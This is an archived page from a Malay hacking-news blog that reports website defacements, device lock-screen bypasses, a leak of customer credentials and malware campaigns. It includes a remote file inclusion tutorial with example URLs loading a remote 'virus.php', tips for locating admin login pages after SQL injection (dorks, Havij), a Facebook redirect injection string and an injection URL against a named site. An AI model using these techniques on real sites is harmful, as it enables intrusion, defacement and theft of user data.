Showing posts with label vulnerability. Show all posts
Showing posts with label vulnerability. Show all posts

Bug Baru Yang Dijumpai oleh Hacker Palestin di Facebook


Assalamualaikum dan selamat sejahtera [GH] ucapkan.


Sebelum itu, [GH] memohon maaf kepada pembaca kerana kurang mengupdate blog buat seketika ini. Kami sedang sibuk dengan hal-hal peribadi yang tidak dapat dielakkan. Baiklah, mari kembali kepada topik asal. Baru-baru ini, Timeline seorang pengasas Facebook iaitu Mark Zuckerberg telah diceroboh oleh seorang penggodam atau hacker dari Palestin yang dikenali sebagai 'Khalil Shreateh'.

Menurut sumber, beliau juga merupakan seorang Web Developer. Beliau menyatakan telah menjumpai satu bug atau vulnerability(kelemahan) yang baru di Facebook. Dimana kita boleh mengakses tetapan privasi seseorang itu dengan mengepos sesuatu di Timeline/Wall orang tersebut. Khalil Shreateh dipaksa untuk menghantar butiran vulnerability pada Timeline Mark Zuckerberg untuk membuktikan bug yang dijumpainya itu.

Selepas itu, Pasukan Keselamatan Facebook gagal untuk mengenal pasti vulnerability itu sebanyak tiga kali. Bug ini boleh digunakan keatas seseorang yang bukan berada di Friends List kita. Menurut Bug Bounty Program Facebook, seorang penyelidik telah mengemukakan butiran vulnerability melalui e-mail kepada Pasukan Keselamatan Facebook tanpa mendedahkan butiran tersebut kepada orang awam.

Dalam usaha mendapatkan ganjaran minimum sebanyak AS $500, vulnerability haruslah sah. Kelemahan yang dilaporkan terdapat di dalam fail "composer.php" mekanisme Facebook. Pertama, Khalil membuat 1 pos pada Timeline/Wall seorang gadis, Amal Saleh yang belajar di kolej yang sama dengan CEO Facebook, Mark Zuckerberg.


Tetapi, Pasukan Keselamatan Facebook tidak mampu untuk mengeluarkan semula pada masa pertama dan mereka menjawab, "Maaf, ini bukan bug." Akhirnya, beliau menjelaskan pengalaman yang mengecewakan beliau dengan Pasukan Keselamatan lalu menghantar butiran vulnerability pada Timeline Mark Zuckerberg. Untuk membuktikan laporannya dan selepas itu beliau mendapat 'reply' dari seorang 'jurutera Facebook' meminta semua maklumat tentang vulnerability itu.

Selepas menerima laporan bug yang ketiga, seorang jurutera keselamatan Facebook akhirnya mengakui vulnerability itu tetapi berkata bahawa Khalil tidak akan dibayar atas laporan yang dilakukan kerana tindakan beliau telah melanggar syarat-syarat keselamatan laman web perkhidmatan.

Portal Microsoft Malaysia Digodam Hacker Bangladesh


Assalamualaiikum dan Selamat Sejahtera kepada semua pembaca GilerHackers!
kami di maklumkan laman microsoft.com.my diceroboh oleh penggodam dari bagladesh.Mereka yang mengelar kumpulanya dengan Nama TiGer-M@TE  berjaya memecah masuk benteng keselamatan laman berkenaan sekaligus merubah halaman utama kepada defacement mereka.

Selain dari portal microsoft malaysia, laman laman lain juga turut terjejas, diantaranya:
  1. dell.com.my
  2. skype.com.my
  3. kaspersky.com.my
  4. msn.com.my
  5. bing.com.my
  6. google.co.ke
  7. dell.co.ke
  8. skype.co.ke
  9. msn.co.ke
  10. bing.co.ke
  11. linkedin.co.ke
lihat lebih banyak di zone-H.org
mengikut rekod yang dicatatkan, mereka telah menggodam lebih dari 205,700, laman sesawang setakat ini.
Mengikut pada mesej yang ditinggalkan pada defacement adalah berpunca dari tidak puas hati kepada rakyat malaysia kerana layan yang tidak baik terhadap pekerja pekerja bangladesh.

Bypass iPhone iOS 7 LOCK SCREEN Vulnerability


Assalamualaikum dan selamat sejahtera [GH] ucapkan kepada semua pembaca. Baru-baru ini Apple telah melancarkan 1 lagi versi iOS yang terbaru iaitu iOS7 di WWCD 2013. 

Dan selepas 48 jam pelancaran iOS7 itu, seorang pengguna iPhone bernama Jose Rodriguez telah berjaya memintas skrin kunci untuk mengakses aplikasi Photos dalam beberapa saat.

iOS sangat terkenal dengan 'lockscreen security bugs' yang membolehkan sesiapa sahaja memintas kod laluan pada peranti untuk mengakses maklumat yang berkemungkinan adalah rahsia. Video dibawah menunjukkan bagaimana untuk sepenuhnya memintas perlindungan kata laluan iPhone dengan mengakses kalkulator yang ada pada skrin kunci. 



"Dengan membuka Bilik Kawalan iOS dan mengakses aplikasi kalkulator telefon sebelum membuka kamera telefon sesiapa sahaja boleh mengakses, memadam, e-mel, memuat naik atau tweet gambar yang ada dalam peranti itu tanpa mengetahui kod laluan."

Hide My WP! 95% selamat dari SQl injection dan Serangan Xss.


Assalamualaiikum dan selamat sejahtera.
Wordpress merupakan salah satu platform yang sangat popular pada masa kini.Penggunaan wordpress sangat luas, ada yang mengunakan wordpress sebagai blog, ada juga yang mengunakan wordpress sebagai tapak untuk laman sesawang rasmi ataupun peribadi.

Pada hakikatnya, ramai pengguna ingin menyembunyikan penggunaan wordpress mereka, ini kerana terdapat pelbagai bugs pada plugin atau tema wordpress.Untuk memastikan ianya sentiasa selamat, kita mungkin tiada masa untuk menyemak atau mengemas kini plugin setiap hari.


Kini anda boleh mencuba plugin Hidemy WP sebgai salah satu cara meningkatkan keselamatan sistem wordpress anda.Baru baru ini, kita boleh lihat serangan besar besaran pengodam terhadap laman laman yang digodam adalah kebanyakannya menggunakan sistem dari wordpress. diantara botnet yang paling agresif yang pernah dilihat

Tingkatkan keselamatan anda
Hidemy WP mengawal akses WP kepada fail PHP. Ia melindungi laman web anda 95% daripada SQL Injection dan serangan XSS. Ini bermakna anda boleh memasang plugin yang tidak selamat tanpa bimbang tentang keselamatan terutama kepada ancaman penggodam, spam dan robot yang selalu menyerang pengguna WordPress.

Ketahui lebih lanjut bagaimana ia berfungsi DISINI | lihat live demo DISINI
Jika anda ingin muat turun secara percuma, sila klick pada button download dibawah:


Jangan Lupa untuk terus bersama kami untuk info info terbaru di facebook GilerHackers DISINI.

Pembagunan Facebook Terjejas kepada ' Text Load Injection!'

Assalamualaiikum dan selamat sejahtera.
Kumpulan penggodam antarabangsa, Anonghost. salah seorang ahlinya memberita kami keselamatan pembagunan facebook terjejas dengan beberapa kelemahan yang dijumpai mereka baru baru ini.

Domain utama developers.facebook.com dikata berjaya ditembus masuk dengan menggunakan kaedah Text Load Injection! Dibawah adalah screenshot yang sempat [GH] ambil -kredit kepada mauritania attacker.


Link: https://developers.facebook.com/MAURITANIA%20ATTACKER%20WAS%20HERE&__a=
Jika Bugs ini sudah di patch, anda boleh melihat mirror di sini: http://zone-h.org/mirror/id/19711340

menurut beliau juga, code ini juga boleh disuntik oleh sesiapa sahaja selagi ianya tidak dibaik pulih sepenuhnya:
for (;;);{"__ar":1,"payload":{"redirect":"/MAURITANIA ATTACKER WAS HERE&__a=/"},"bootloadable":{},"ixData":[]}

Bypass Samsung Galaxy Note II LOCK SCREEN Vulnerability


Assalamualaiikum dan selamat sejahtera.Jika anda seorang pengguna iOS,Mungkin anda pernah mendengar tentang kelemahan keselamatan iPhone yang ditemui baru-baru ini. Boleh rujuk disini [+]Link

Kali ini ia adalah Android yang di buzz hari ini. Khususnya, ia phablet kreatif Samsung Galaxy Note II. Seorang Youtuber bernama Terence Eden baru-baru ini telah memuat naik satu video di youtube yang menunjukkan kelemahan keselamatan pada Samsung Galaxy Note II.

Kelemahan ini menunjukkan bagaimana pengguna boleh memintas skrin kunci dan mengakses aplikasi atau panggilan dari Home Screen  Android OS. Kelemahan ini telah ditunjukkan pada Note II berjalan pada Android 4.1.2 saham OS. Walaupun, pengguna hanya boleh mengakses skrin untuk satu atau dua kali, tetapi ia adalah satu jangka masa yang cukup untuk membuat panggilan atau membuka mana-mana aplikasi pada skrin jika anda cukup cepat.



* Samsung Galaxy S3 Android 4.1.2 juga dikatakan terdedah pada masalah yang sama.

Hack Dengan Kaedah RFI [Remote File Inclusion ] Bagaimana ia berfungsi?

Assalamualaiikum dan selamat sejahtera.RFI atau Remote file inclusion sekarang menjadi salah satu kaedah yang selalu digunakan penggodam selain kaedah suntikan SQL.Jadi kami di [GH] cuba mencari info bagaimana ia berfungsi.

"Remote file inclusion" atau lebih mesra dikenali sebagai "R.F.I" adalah salah satu serangan terhadap laman web dengan membolehkan pihak penyerang menjalankan skrip atau aturcara mereka tersendiri. Kesannya bergantung kepada jenis skrip yang dimasukkan oleh pihak penyerang.

Sekiranya mereka menjalankan aturcara membuang pangkalan data, maka ke semua laman web anda tidak dapat dijalankan memandangkan pangkalan data anda sudah dibuang.

Akhirnya, anda terpaksa mengembalikan pangkalan data yang telah disalin sebelum ini bagi membolehkan laman web berjalan semula seperti biasa. Sehubungan dengan itu, anda boleh gunakan artikel ini sebagai panduan untuk menyelamatkan laman web dari digondam melalui cara ini seandainya anda menggunakan skrip laman web tersendiri. Jika menggunakan CMS, tidak perlu risau mengenainya.

Cara Serangan RFI
Kaedah serangan RFI ini sebenarnya bergantung kepada cara penulisan skrip anda di laman web yang telah dikesan oleh pihak penyerang.

Untuk melakukan penyerang perlu tahu secara lengkap skrip yang anda jalankan. Berikut adalah antara contoh aturcara laman web anda yang telah membuka ruang kepada penyerang dan semestinya dijalankan pada pelayan yang menggunakan PHP.
include($page . '.php');

Aturcara di atas dituliskan dalam satu fail .php yang bakal memproses maklumat yang dihantar contohnya satu laman web borang, selepas diklik butang "Hantar", semua maklumat yang dimasukkan oleh pengguna akan ditujukan ke laman ini. Katakan nama fail tersebut adalah index.php.

Maka selepas diklik butang "Hantar", alamat URL di pelayar web (web browser) akan bertukar menjadi seperti ini:
http://www.websaya.com/index.php?page=arkib

Di mana, bahagian aturcara di dalam index.php akan ditukarkan kepada pembolehubah yang dinyatakan dalam URL menjadi seperti ini:
include('arkib.php');

dan secara tersendirinya, fail index.php akan memanggil fail arkib.php ke dalamnya dan proses seterusnya dijalankan. Oleh kerana pembolehubah $page dalam index.php tidak dinyatakan nilaian asal (default) maka pengondam akan menggunakan pembolehubah ini untuk memasukkan nilaian dari laman web yang lain. Contohnya:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php

dan di bahagian index.php pula, pembolehubah include akan menafsirkan nilaian tersebut menjadi seperti ini:
include('http://www.weblain.com/virus.php.php');

Tetapi oleh kerana pihak pengondam tidak mengetahui secara lengkap apakah jenis sambungan yang anda akan tetapkan, jadi mereka akan meletakkan tanda "?" dibelakang alamat URL bagi membolehkan aturcara dibahagian pelayan melepaskan fail tersebut untuk diproses.

Tanda "?" membawa maksud supaya pihak pelayan (server) menentukan sendiri bentuk fail tersebut. Sekiranya sambungan yang telah ditetapkan adalah .php, maka dengan sendiri fail tersebut dilepaskan.

Sekiranya sambungan dibahagian include ditetapkan kepada .ini berbanding .php seperti include($page . '.ini'); maka "?" akan menjadikan sambungan seterusnya sebagai pembolehubah yang lain. Sebagai contoh:
include($page . '.ini');

dan "URL injection" yang dimasukkan adalah seperti ini:
http://www.websaya.com/index.php?page=http://www.weblain.com/virus.php?

maka, proses yang berlaku di dalam index.php adalah:
include('http://www.weblain.com/virus.php?.ini');

pada asalnya, bagi menjalankan aturcara, pengondam seharusnya menggunakan sambungan fail .ini. Tetapi pihak pembangunan telah meletakkan sambungan .ini berbanding .php. Oleh kerana kehadiran "?", maka dibahagian pelayan (server) tetap menjalankan proses dengan memanggil fail tersebut walaupun sambungan berlainan kerana tanda "?" menjadikan sambungan .ini sebagai satu pembolehubah yang lain.

Dengan ini, fail virus.php tersebut dengan sendirinya akan dimasukkan ke dalam index.php dan dijalankan. Seterusnya akan merosakkan laman web anda mengikut aturcara yang ditulis oleh pihak pengondam.

Kenapa serangan ini boleh dijalankan
register_global dihidupkan. register_global membolehkan PHP mengambil secara pembolehubah yang dinyatakan di dalam URL tanpa melalui proses tapisan sekuriti terlebih dahulu. Oleh sebab itu, kebiasaanya untuk pelayan-pelayan web (server) yang baru, fungsi ini dimatikan secara asalnya.

allow_url_fopen
dihidupkan. Fungsi ini membenarkan PHP untuk memasukkan sebarang maklumat atau membuka ruang untuk kemasukkan fail yang lain dari domain yang asal (kiranya memasukkan fail dari tempat yang lain). Oleh sebab itu, dalam versi PHP 5.2, fungsi ini telah diubahsuai dan diasingkan yang mana untuk fungsi include(), allow_url_include telah diwujudkan dan tetapan ini telah dimatikan secara sendirinya.

Cara mengatasi serangan RFI
Terdapat beberapa cara yang boleh kita lakukan untuk mengatasi dan melindungi laman web dari terkena serangan ini tetapi di sini saya cuma tunjukkan satu cara sahaja iaitu dengan menggunakan .htaccess fail. Sebelum itu, perlu pastikan bahawa pelayan menyokong "mod_rewrite"

Dengan menggunakan arahan di bawah ini, ia akan memeriksa sebarang permintaan yang datang dari URL luaran iaitu http://, https:// dan ftp://
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)

Seterusnya dengan memasukkan kod di atas di dalam .htaccess dan diikuti dengan beberapa arahan lain seperti:
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp):\/\/(.*)
RewriteRule ^(.+)$ - [F]

Seandainya anda mempunyai akses terus ke dalam pelayan untuk mengendalikan beberapa modul-modul server, anda boleh gunakan arahan ini:
<IfModule mod_rewrite.c>
RewriteEngine on
RewriteCond %{QUERY_STRING} (.*)(http|https|ftp)://(.*)
RewriteRule ^(.+)$ - [env=rfi:true]
</IfModule>
CustomLog /path/to/logs/rfi.log combined env=rfi

Sumber Rujukan

Kaedah Mencari "Admin Login" di Laman Web

Assalamualaiikum dan selamat sejahtera.
Mencari halaman "Admin Login" kadang kala sangat sukar, Disini [GH] kongsikan sedikit tips yang mungkin membantu anda.Setelah sesuatu web terdedah kepada suntikan SQL (SQLI)  mungkin mudah untuk mendapat nama pengguna dan katalaluan, langkah seterusnya ialah  mencari halaman Log masuk "Admin Login" untuk masuk sebagai pemilik laman berkenaan.

Dibawah adalah beberapa kaedah / Tips untuk mencari halaman log masuk pentadbir "Admin Login"
1.Menambah Url
ni adalah kaedah yang pertama dan paling mudah untuk mencari laman login admin. Anda boleh menambah beberapa perkataan selepas URL.contoh:
www.site.com/admin
www.site.com/administrator
www.site.com/login
www.site.com/wp-login.php
www.site.com/admin.php

2.Mengguna Crawling software
Anda boleh menggunakan pelbagai alat jenis Crawling software untuk merangkak ke dalam laman web untuk mendapatkan halaman "Admin Login". ia mencari semua muka surat/page didalam laman web dan memaparkan senarai semua laman di direktori.

3.Robots.txt
pemilik laman web sebenarnya memberikan senarai pautan yang tidak boleh dicari oleh enjin pencarian "Search Engine".kadang kala pemilik akan menyembunyikan Halaman "Admin Login" Mereka pada robots.txt. secara langsung anda boleh melihat di fail robots.txt dengan menambah /robots.txt pada Url.
Contoh: www.site.com/robots.txt

4.Google Dork'
Ada juga boleh menggunakan google dork untuk mencari halaman "Admin Login" contoh seperti:
#Site:site.com “admin”
#Site:site.com inurl:login
#site:site.com intitle:"admin login"

5.Online
Terdapat juga beberapa laman web yang menyediakan perkhidmatan mencari halaman "Admin Login" secara online, anda juga boleh menggunakan laman web ini untuk mencari halaman "Admin Login" [Link+]

6.Havij
Havij merupakan salah satu software yang sangat popular sehingga ke hari ini,ia juga mempunyai pengimbas untuk membantu anda menemukan halaman "Admin Login"

7.Dan Banyak Lagi.. ^_^

Sebagai Tindakan, anda mungkin dapat mencegah penggodam khasnya yang berniat jahat untuk masuk ke dalam halaman anda,Jadi cuba elakan  perkara yang tersenarai diatas dari ditemukan oleh mereka.. sekian..

Hong Leong Bank Kena Hack

Assalamualaiikum dan selamat sejahtera kepada semua rakan rakan [GH] yang sentiasa mengikuti perkembangan blog kami.Berita yang agak mengejutkan kami ketika mendapat tahu bahawa laman Hong Leong Bank Malaysia digodam sekitar 10 minit yang lepas. Laman Hong Leong bank Malaysia, www.hlam.com.my diceroboh! Penggodam yang berniat jahat mengubah laman utama kepada defacement mereka yang disertakan sebuah video seolah-olah ingin menyampaikan mesej tertentu kepada kerajaan Malaysia.

Screen shoot:

Link: http://www.hlam.com.my/
Mirror: http://www.hack-db.com/312903.html

video yang diletakan pada defacement bertajuk "This is Satu Malaysia


Penggodam tempatan yang dikenali dengan nama KamiSec Team mendakwa, kelemahan sistem pada bahagian pentadbir membuatkan laman berkenaan digodam.
"Kami Test Sekadar Untuk Menguji tahap web itu . dan kami juga mengiklan kan video dari Be End- hahahaha "- KamiSec Team.

Bagi pendapat [GH], perbuatan seperti ini tidak sepatutnya berlaku, selain boleh mencemarkan nama malaysia, kita juga haruslah bersikap profesional,[GH] juga ingin menegaskan disini, kami tidak berpihak pada mana mana pihak, kami cuma memberi pendapat  peribadi sahaja. Pandangan dan komen terpulang kepada pembaca untuk menilai.walupun begitu, pihak webmaster sepatutnya mengambil serius terhadap keselamatan laman webs pelangan mereka, lebih lebih lagi laman penting seperti ini.

Kerentanan Pada Apple ID Membolehkan Pengodam Mengubah Kata Laluan Dengan Mudah


Nampaknya kini pengguna Apple menghadapi masalah serius apabila sebuah masalah kerentanan baru ditemui, membolehkan kata laluan sesuatu akaun Apple ID itu ditetapkan semula oleh sesiapa sahaja yang mengetahui emel dan juga tarikh lahir seseorang pemilik Apple ID.

Masalah ini dilaporkan hari ini, selepas semalam Apple mula memperkenalkan sokongan pengesahan dwi-faktor untuk pengguna mereka.

Daripada apa yang dilaporkan, ia dikatakan melalui penggunaan sebuah URL, kemudian pengguna akan dibawa ke sebuah halaman khas yang meminta menjawab tarikh lahir pengguna. Dengan laman sosial yang digunakan dengan meluas, penggunaan tarikh lahir merupakan salah satu perkara yang tidak lagi rahsia, dan mungkin boleh diketahui oleh rakan-rakan anda yang lain dengan mudah.

Memandangkan sokongan pengesahan dwi-faktor Apple masih belum diperkenalkan untuk semua buat masa ini, mungkin cara untuk mengatasi masalah kerentanan ini untuk sementara waktu adalah dengan mengubah tarikh lahir secara manual pada akaun tetapan.

Sumber Rujukan: Amanz.my

Laman Indah Water Diceroboh 2494 email dan katalaluan dilepaskan kepada umum.


Assalamualaiikum dan selamat sejahatera.Apa khabar pembaca di [GH].Pagi ini kami menerima email dari sekumpulan penggodam (malaysia) yang berjaya menceroboh laman web indahwater (www.iwk.com.my).Apa yang menjadi topik ialah ketika mereka melepaskan beberapa maklumat peribadi seperti email dan password (katalaluan) kepada Umum.

Mereka yang hanya ingin dikenali dengan nama Falcon Legion dikatakan berjaya menceroboh  dengan mengunakan teknik suntikan SQL  pada salah satu alamat:http://iwk.com.my/v/news/pop-out-audio?iframe=true&width=390&height=80&id=%&#39. setakat ini tiada apa apa kerosakan pada sistem laman tersebut. tetapi sebanyak 2494 maklumat telah dilepaskan kepada umum.

Lihat semua email dan kata laluan yang didedahkan DISINI
atau muat turun kesemua log dibawah:

.
Kepada pemilik akaun anda dinasihati agar menukar katalaluan kepada yang baru.Jika anda mempunyai sebarang pertanyaan, sila hubungi kami di facebook www.fb.com/myGilerHackers atau emailkan kepada gilerhackers@gmail.com

*Nak Samsung Galaxy SIII mini dengan RM999?

Sistem komputer Bank dan TV selatan korea digodam


Seoul: Rangkaian komputer di dua bank terbesar Korea Selatan dan tiga televisyen terkemuka terganggu semalam, melumpuhkan mesin bank di seluruh negara itu dan mencetuskan spekulasi serangan siber oleh Korea Utara.

Layar gelap pada jam 2.00 petang waktu tempatan dengan gambar tengkorak muncul pada skrin sebahagian komputer petunjuk ketara penyerang meletakkan kod berniat jahat dalam sistem Korea Selatan, kata Agensi Keselamatan Maklumat Korea. Sebahagian komputer mula pulih lebih dua jam setengah kemudian.
Polis dan pegawai Korea Selatan yang menyiasat gangguan itu berkata puncanya belum diketahui. Namun spekulasi berpusat pada Korea Utara, dengan pakar berkata serangan siber yang diatur Pyongyang berkemungkinan dipersalahkan.

Gangguan berlaku di tengah peningkatan retorik dan ancaman serangan dari Pyongyang sebagai reaksi kepada hukuman Pertubuhan Bangsa-Bangsa Bersatu (PBB) bagi pelancaran roket rejim komunis berkenaan Disember lalu dan ujian nuklear Februari lalu. Washington turut meluaskan sekatan bulan ini dalam usaha melumpuhkan kemampuan rejim itu membangunkan program nuklearnya.

Ancam balas dendam

Korea Utara mengancam membalas dendam bagi sekatan dan rutin berterusan latihan tentera Amerika Syarikat dan Korea Selatan yang dianggapnya sebagai persediaan menceroboh.

Tuduhan serangan siber ke atas Semenanjung Korea bukan perkara baru. Seoul percaya Pyongyang adalah dalang di sebalik dua serangan siber ke atas syarikat tempatan pada 2011 dan 2012.
Kelumpuhan rangkaian komputer terbaru berlaku beberapa hari selepas Korea Utara menuduh Korea Selatan dan Amerika melancarkan serangan siber yang mengganggu laman webnya selama dua hari minggu lalu. Pembekal perkhidmatan beribu pejabat di Thailand mengesahkan gangguan itu, tetapi tidak menyebut punca masalah itu.

“Ia pasti serangan komputer. Gangguan serentak itu tidak mungkin disebabkan masalah teknikal,” kata Dekan Graduan Sekolah Keselamatan Maklumat Universiti Korea, Lim Jong-in, mengenai kejadian semalam.

Bank peminjam kumpulan perbankan keempat terbesar Korea Selatan, Shinhan Bank, melaporkan gangguan sistem, termasuk perbankan online dan mesin pengeluar automatik (ATM).

Bank Simpanan Nasional Terdedah kepada Bahaya!


Assalamualaiikum dan selamat sejahtera. salam perpaduan.
Kami di [GH] sangat berbesar hati dengan menerima email dari seorang yang tidak ingin namanya didedahkan kepada umum.Mengikut apa yang dikirim kan kepada kami,Beliau mendakwa laman bank simpanan nasional (www.mybsn.com.my) berada didalam keadaan yang kurang selamat.

Tiada maklumat terperinci diberitahu kami, Tetapi mengikut kenyataan beliau,  masalah pada CMS yang dibuat kemaskini menyebabkan laman tersebut berada didalam keadaan "TERDEDAH!"

dibawah adalah screenshot bukti bahawa sejenis file PHP yang berjaya dimuat naik,


Walaupun begitu, satu tidandakan bijak yang harus diberi pujian kerana masalah ini telah dilaporkan kepada pihak bertanggung jawab sebagai satu langkah keselamat dari berlakunya masalah yang tidak di ingini.
Jika anda mempunyai berita yang ingin dikongsikan kepada kami, sila rujuk DIBAHAGIAN ini.

Marshable.net Terdedah kepada XSS vulnerability

Assalamualaiikum dan selamat sejahtera.
Baru baru ini,dikatakan kepada pemilik social network (rangkaian sosial) yang menggunakan script PHPFoX  untuk halaman mereka.kemungkinan besar mereka terdedah kepada suntikan XSS (mengikut eksploitasi)

Apa itu XSS
Cross Site Scripting atau kependekannya XSS ialah satu kaedah serangan menghantar malicious code yang disuntik (inject) pada URL laman web, dengan kelihatan seolah-olah datang dari sumber yang boleh dipercayai integritinya. Melalui cara ini, penggodam akan dapat memperolehi maklumat-maklumat sulit atau peribadi sasaran, juga dapat melancarkan aplikasi berbahaya.

Dengan kata lain, ia adalah kaedah serangan melalui Javascript yang dibuat untuk mengeksploitasi kelemahan (vulnerability) pada sesebuah laman web. (via: OMG hackers)

beberapa laman social Network malaysia seperti Marshable.net, Myheppi.com, Youkawan.com terjejas kepada serangan jenis ini.

dibawah adalah screenshot selepas kod XSS yang disuntik pada Url Mereka:


Live Demo:
www.Marshable.net/XSS-demo
www.myHeppi.com/XSS-demo
www.youKAWAN.com/XSS-demo

* Hosting Murah Serendah RM6.00? Domain Semurah RM30.00? biar betul beb!

Lagi Laman Web Filipina Digodam

Dotmy Team Malaysia Kembali lakukan Serangan

Assalamualaiikum dan selamat sejahtera,
DOTMY TEAM? Siapa mereka?
Dotmy team merupakan satu kumpulan pencinta IT yang bergerak secara "bawah tanah" Underground,Walaupun mereka menafikan bahawa kumpulan mereka bukan terdiri didalam golongan Black Hat hackers! tetapi dengan corak serangan ganas menjadi tanda tanya :P

Sebelum Ini GH pernah mengeluarkan beberapa artikel tentang Isu Laman web Lucah di godam beberapa penggodam Tempatan.

Setelah sekian laman DOTMY team sepi didalam dunia siber mereka,kebelakangan ini GH perhatikan RainSeven DOTMY selaku pengasas kumpulan aktif melakukan kegiatan "godam" dengan mendeface beberapa halaman. Terbaru, laman transferapatient.com menjadi mangsa pencerobohan!


Mesej yang disampaikan berbentuk "TINGKATKAN KESELAMATAN" namun begitu, seolah olah mempunyai mesej tersembunyi disebalik penyampaiannya...
Lihat semua rekod Rain Seven Dotmy di zone-h DISINI

'MiniDuke' malware | sasar kerajaan Euro melalui Adobe


Satu serangan baru mensasarkan kerajaan Eropah melalui kelemahan mengeksploitasi pada perisian Reader Adobe.

Kaspersky Lab dan CrySys Lab hari ini memperincikan sebuah program berniat jahat baru di "alam liar", dipanggil "MiniDuke," yang telah menjadi entiti-entiti menyerang kerajaan dan institusi-institusi  Eropah. Entiti kerajaan di Ukraine, negeri Portugal, Romania, dan lainnya telah disasarkan, ( menurut penyelidik keselamatan.)

MiniDuke didapati dijalankan pada komputer-komputer yang dijangkiti melalui PDFs. Penggodam berniat jahat --
Kaspersky percaya mungkin pendam untuk seketika disebabkan oleh persamaan teknik yang pernah digunakan sejak akhir 1990-an -- Dipercayai pembangunan  PDFs yang kelihatan seperi biasa!. Sebaik sahaja fail di muat turun kepada sebuah komputer, eksploitasi, yang ditulis  Assembler dan hanya 20KB sahja saiznya, mengambil kesempatan atas kelemahan unpatched dalam versi-versi Reader 9, 10, dan 11.

Selepas kesemua pemeriksaan dan perlindungan ditempatkan, perisian dihubungkan kepada Twitter untuk mencari tweet pada akaun-akaun premade. Tweet itu mengandungi tanda-tanda yang telah dikodkan URLs  backdoors membolehkan ia  menghantar dan  memerintahkan untuk membuka backdoors  melalui fail-fail GIF.

Penggodam mengeksploitasi pepijat Adobe  dalam satu kemas kini minggu lepas yang akan menyebabkan program-programnya terhempas dan membenarkan  penyerang mendapat kawalan atas satu komputer yang dijangkiti virus.

* Dapatkan berita berita terkini, Isu semasa, Politik, Setempat dan Terkini DISINI (BOOKMARK)

[Download] Acunetix v8.0 100% Free


Free Download Acunetix v8.00
Assalamualaiikum,dan salam 1 Malaysia.
Apa Itu acunetix?
Acunetix adalah sebuah software yang berfungsi untuk melakukan scanning atas kelemahan yang  terdapat pada laman web anda. Dengan memakai software ini, anda akan mengetahui apa  kelemahan yang terdapat di laman webs  anda beserta "saranan" apa yang harus Anda lakukan atas kelemahan yang di temukan tersebut.

Software ini secara automatik akan memeriksa kelemahan yang terdapat pada laman web anda., ciri ciri:

* Version Check : Vulnerable Web Servers, Vulnerable Web Server Technologies – such as “PHP 4.3.0 file disclosure and possible code execution, CGI Tester, Checks for Web Servers Problems – Determines if dangerous HTTP methods are enabled on the web server (e.g. PUT, TRACE, DELETE), Verify Web Server Technologies.

* Parameter Manipulation : Cross-Site Scripting (XSS) – over 25 different XSS variations are tested, SQL Injection, Code Execution, Directory Traversal, File Inclusion, Script Source Code Disclosure, CRLF Injection, Cross Frame Scripting (XFS), PHP Code Injection, XPath Injection, Full Path Disclosure, LDAP Injection, and Cookie Manipulation.
* And Much Other

System Requirements
· Microsoft Windows XP Professional or Home Edition, Windows 2000,
Windows Server 2003 and Windows Vista.
· 1 GB of RAM.
· 200 MB of available hard-disk space.
· Microsoft Internet Explorer 6 (or higher).
· Microsoft SQL Server / Access support – if database is enabled
(optional).

Download Acunetix 8.0 Disini: | Baca Panduan untuk install DISINI

Susulan isu GODAM "penipuan perdana menteri letak jawatan"


Assalamualaiikum,dan selamat sejahtera. sebelum ini GH pernah menulis artikel berkaitan Laman Rasmi e-Penerangan Digodam "sofea hana". Isu ini benar benar menjadi hanggat selepas mendapat perhatian beberapa akhbar tempatan dan antarabangsa!

Terbaru, Mengikut sumber dari  salah satu akhbar tempatan, Isu tentang Penipuan Dato Sri Najib meletak jawatan menjelaskan bahawa mereka tidak pernah mengeluarkan mana mana kenyataan berkaitan tersebut dan ia adalah salah satu daripada perilaku Jenayah Siber!.Mengikut kenyataan,Siasatan mengesan alamat IP yang digunakan penggodam bukanlah dari Malaysia.
"Kami telah menjejaki alamat IP dan ia bukan alamat tempatan," katanya kepada pemberita selepas membuat laporan di ibu pejabat polis daerah Putrajaya hari ini.
"Ia adalah asing, tetapi saya tidak akan menyebut negara ini kerana kami percaya penggodam boleh membuat perebutan alamat IP mereka.
Beliau berkata Suruhanjaya Komunikasi dan Multimedia Malaysia (SKMM) adalah menyedari serangan dan telah memulakan siasatan.
"Kami juga telah memaklumkan kepada Jabatan Perdana Menteri," kata Ibrahim, yang menyifatkan serangan siber sebagai "langkah terdesak" oleh pihak-pihak tertentu untuk mencemarkan reputasi kerajaan dan jabatan.
"Ia seolah-olah bahawa sejak kebelakangan ini, ada telah serangan terhadap laman web kerajaan walaupun ini adalah kali pertama bahawa sistem e-Akhbar dan e-Press telah digodam," katanya
Dimaklumkan juga pihak mereka akan mencari dan memperkuatkan sistem keselamatan laman sesawang mereka. - Thesundaily

GH berharap selepas ini pihak yang terlibat mengambi lebih berat terhadap sistem keselamatan mereka lebih lebih lagi website yang penting seperti ini dan berharap kejadian sebegini tidak berulang lagi.

Jika anda mempunyai berita yang ingin dilaporan kepada kami, sila emailkan kepada gilerhackers@gmail.com

Tvmakmur kenahack!

Assalamualaiikum dan selamat sejahtera.
Kami di GH menerima laporan dari salah seorang rakan di Group Gilerhackers member memberitahu tentang sebuah laman Live Streaming Malaysia digodam oleh sebuah kumpulan penggodam dari Indonesia!

Penggodam meninggalkan jejak pada salah satu folder pada laman web berkenaan
link defacement: http://www.tvmakmur.com/ustream
screenshot:

Mengikut kenyataan, kelemahan pada bug yang terdapat pada laman sesawang berkenaan menjadi punca utama masalah pencerobohan ini berlaku.

*Tukar ganti broadband ANDA untuk PortaWiFi yang baru hari ini!
 

© Copyright 2013 [GH] GilerHackers! All Rights Reserved.
Beo v.3 Themes Design by BukhariMalek | Contact On Facebook Diselenggara Oleh: IdeaKreatif